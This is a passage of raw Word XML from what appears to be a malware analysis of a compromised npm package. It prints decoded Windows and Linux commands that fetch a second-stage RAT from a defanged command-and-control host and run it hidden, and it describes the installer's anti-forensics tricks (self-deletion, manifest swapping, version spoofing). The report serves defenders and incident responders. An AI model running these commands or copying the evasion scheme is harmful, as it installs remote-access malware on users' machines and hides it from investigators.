    <w:p w14:paraId="278CFA5E"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Observed Windows command (decoded):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA5F"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"cmd.exe" /c curl -s -X POST -d "packages.npm.org/product1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA60"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hxxp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sfrclak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[.]com:8000/6202033" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA61"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"%TEMP%\6202033.ps1" &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA62"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"%PROGRAMDATA%\wt.exe" -w hidden -ep bypass -file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA63"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"%TEMP%\6202033.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA64"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color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hxxp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sfrclak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[.]com:8000/6202033" &amp; del</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA65"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spacing w:after="283"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"%TEMP%\6202033.ps1" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA66"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SHA-256 hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA67" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (6202033.ps1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA68" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (6202033.ps1 variant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA69" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (system.bat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA6A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="280" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Second-Stage RAT: Linux/Other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA6B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">A Python payload is downloaded to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>/tmp/ld.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and launched detached via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>nohup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3 ... &amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, suppressing output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA6C"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Observed Linux command (decoded):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA6D"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rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c "curl -o /tmp/ld.py -d packages.npm.org/product2 -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA6E"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rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">hxxp://sfrclak[.]com:8000/6202033 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nohup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3 /tmp/ld.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA6F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="8" w:color="DDDDDD"/>
          <w:left w:val="single" w:sz="2" w:space="12" w:color="DDDDDD"/>
          <w:bottom w:val="single" w:sz="2" w:space="8" w:color="DDDDDD"/>
          <w:right w:val="single" w:sz="2" w:space="12" w:color="DDDDDD"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="283"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Courier New;monospace" w:hAnsi="Consolas;Courier New;monospace"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hxxp://sfrclak[.]com:8000/6202033 &gt; /dev/null 2&gt;&amp;1 &amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA70" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SHA-256:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA71" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="280" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Post-Execution Defense Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA72"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After launching the second-stage payload, the installer logic employs significant anti-forensics measures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA73" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>setup.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>removes itself</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA74" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The original </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (containing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>postinstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hook) is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA75" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A pre-staged clean manifest (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>package.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>renamed to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, leaving a clean-looking manifest that hides the original install trigger from post-incident </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> inspection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA76" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The spoofed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> reports its version as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>4.2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>4.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), deceiving </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA77" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A top-level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>try/catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> swallows all errors so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install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> always exits with code 0</w:t>
      </w:r>
    </w:p>
